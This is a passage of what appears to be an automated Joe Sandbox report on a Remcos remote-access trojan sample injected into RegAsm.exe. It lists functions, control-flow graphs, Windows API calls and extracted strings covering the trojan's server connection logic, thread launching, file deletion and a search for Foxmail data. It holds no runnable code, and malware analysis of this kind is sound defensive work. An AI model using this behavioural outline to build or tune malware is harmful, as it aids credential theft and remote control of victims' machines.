40ee51 193->211 212 40ee44-40ee4f call 436e90 193->212 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 356 40f159-40f16c call 401e65 call 401fab 346->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 409 40f279-40f280 404->409 410 40f26d-40f277 CreateThread 404->410 405->404 413 40f282-40f285 409->413 414 40f28e 409->414 410->409 415 40f287-40f28c 413->415 416 40f2cc-40f2df call 401fab call 4134ff 413->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 414->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                        APIs
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                        • String ID: sU$8SG$8SG$@5U$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-R2I0JW$Software\$User$`2U$dMG$del$del$exepath$licence$license_code.txt
                                                                        • API String ID: 2830904901-2913333753
                                                                        • Opcode ID: 0ddb8f7fe896439c3356cabd6246e43da0fa9b57f35507021f4f8b6732c3ecef
                                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                        • Opcode Fuzzy Hash: 0ddb8f7fe896439c3356cabd6246e43da0fa9b57f35507021f4f8b6732c3ecef
                                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                        Function 00414F2A Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 809sleepnetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 612 415210-415225 call 404f51 call 4048c8 606->612 613 4151e5-41520b call 402093 * 2 call 41b4ef 606->613 627 415aa3-415ab5 call 404e26 call 4021fa 607->627 612->627 628 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 612->628 613->627 643 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 627->643 644 415add-415ae5 call 401e8d 627->644 694 415380-41538d call 405aa6 628->694 695 415392-4153b9 call 401fab call 4135a6 628->695 643->644 644->523 694->695 701 4153c0-415485 call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 695->701 702 4153bb-4153bd 695->702 725 41548a-415a16 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 701->725 702->701 948 415a18-415a1f 725->948 949 415a2a-415a31 725->949 948->949 950 415a21-415a23 948->950 951 415a33-415a38 call 40b051 949->951 952 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 949->952 950->949 951->952 963 415a71-415a7d CreateThread 952->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 952->964 963->964 964->627
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,@5U,00000000), ref: 00414F7B
                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                        • String ID: sU$ | $%I64u$5.0.0 Pro$8SG$@5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-R2I0JW$TLS Off$TLS On $`2U$dMG$hlight$name$NG$NG
                                                                        • API String ID: 524882891-140671004
                                                                        • Opcode ID: c51202c70a3ec075000535c4165a027f275f208f431bf3365679d4806e8f145b
                                                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                        • Opcode Fuzzy Hash: c51202c70a3ec075000535c4165a027f275f208f431bf3365679d4806e8f145b
                                                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                                                        Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 971 412ab4-412afd GetModuleFileNameW call 4020df * 3 978 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 971->978 1003 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 978->1003 1026 412c2b 1003->1026 1027 412c1d-412c25 Sleep 1003->1027 1028 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412ccd 1028->1051 1052 412cbf-412cc7 Sleep 1028->1052 1053 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412d61-412d69 Sleep 1053->1076 1077 412d6f-412d94 1053->1077 1076->1053 1076->1077 1078 412d98-412db4 call 401f04 call 41c485 1077->1078 1083 412db6-412dc5 call 401f04 DeleteFileW 1078->1083 1084 412dcb-412de7 call 401f04 call 41c485 1078->1084 1083->1084 1091 412e04 1084->1091 1092 412de9-412e02 call 401f04 DeleteFileW 1084->1092 1094 412e08-412e24 call 401f04 call 41c485 1091->1094 1092->1094 1100 412e26-412e38 call 401f04 DeleteFileW 1094->1100 1101 412e3e-412e40 1094->1101 1100->1101 1103 412e42-412e44 1101->1103 1104 412e4d-412e58 Sleep 1101->1104 1103->1104 1106 412e46-412e4b 1103->1106 1104->1078 1107 412e5e-412e70 call 406b28 1104->1107 1106->1104 1106->1107 1110 412e72-412e80 call 406b28 1107->1110 1111 412ec6-412ee5 call 401f09 * 3 1107->1111 1110->1111 1117 412e82-412e90 call 406b28 1110->1117 1122 412eea-412f23 call 40b904 call 401f04 call 4020f6 call 41322d 1111->1122 1117->1111 1123 412e92-412ebe Sleep call 401f09 * 3 1117->1123 1138 412f28-412f4e call 401f09 call 405b05 1122->1138 1123->978 1137 412ec4 1123->1137 1137->1122 1143 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1143 1144 4130a8-4131a1 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1144 1213 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                                        • API String ID: 1223786279-2576077980
                                                                        • Opcode ID: 0c3532b0c3f0b05011db00d0dcb598a2c0add988ca924e5378daa270bc24d60c
                                                                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                        • Opcode Fuzzy Hash: 0c3532b0c3f0b05011db00d0dcb598a2c0add988ca924e5378daa270bc24d60c
                                                                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                                        Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                          • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                          • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                          • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                          • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                        • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                        • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                        • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                        • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                        • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                        • API String ID: 672098462-2938083778
                                                                        • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                        • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                        • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                        • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                        Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1286 414d86-414dc2 1287 414dc8-414ddd GetSystemDirectoryA 1286->1287 1288 414edd-414ee8 1286->1288 1289 414ed3 1287->1289 1290 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 1287->1290 1289->1288 1295 414e31-414e3b GetProcAddress 1290->1295 1296 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 1290->1296 1297 414e42-414e44 1295->1297 1298 414e3d-414e40 FreeLibrary 1295->1298 1309 414e82-414e8c GetProcAddress 1296->1309 1310 414ecf-414ed2 1296->1310 1297->1296 1300 414e97 1297->1300 1298->1297 1302 414e99-414eaa GetProcAddress 1300->1302 1304 414eb4-414eb7 FreeLibrary 1302->1304 1305 414eac-414eb0 1302->1305 1308 414eb9-414ebb 1304->1308 1305->1302 1307 414eb2 1305->1307 1307->1308 1308->1310 1313 414ebd-414ecd 1308->1313 1311 414e93-414e95 1309->1311 1312 414e8e-414e91 FreeLibrary 1309->1312 1310->1289 1311->1300 1311->1310 1312->1311 1313->1310 1313->1313
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                        • API String ID: 2490988753-744132762
                                                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                                        Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420c60 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b4ef 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1334 404941-40494e call 420e8f 1322->1334 1335 404932-40493c 1322->1335 1323->1322 1327 404a71-404a76 1324->1327 1328 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1324->1328 1330 404a7b-404a94 call 402093 * 2 call 41b4ef 1327->1330 1328->1320 1330->1320 1348 404950-404973 call 402093 * 2 call 41b4ef 1334->1348 1349 404987-404992 call 421a40 1334->1349 1335->1330 1375 404976-404982 call 420ca0 1348->1375 1360 4049c4-4049d1 call 420e06 1349->1360 1361 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1349->1361 1371 4049d3-4049f6 call 402093 * 2 call 41b4ef 1360->1371 1372 4049f9-404a14 CreateEventW * 2 1360->1372 1361->1375 1371->1372 1372->1317 1375->1320
                                                                        APIs
                                                                        • connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                        • API String ID: 994465650-2151626615
                                                                        • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                        • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                        Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                        • String ID:
                                                                        • API String ID: 3658366068-0
                                                                        • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                        • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
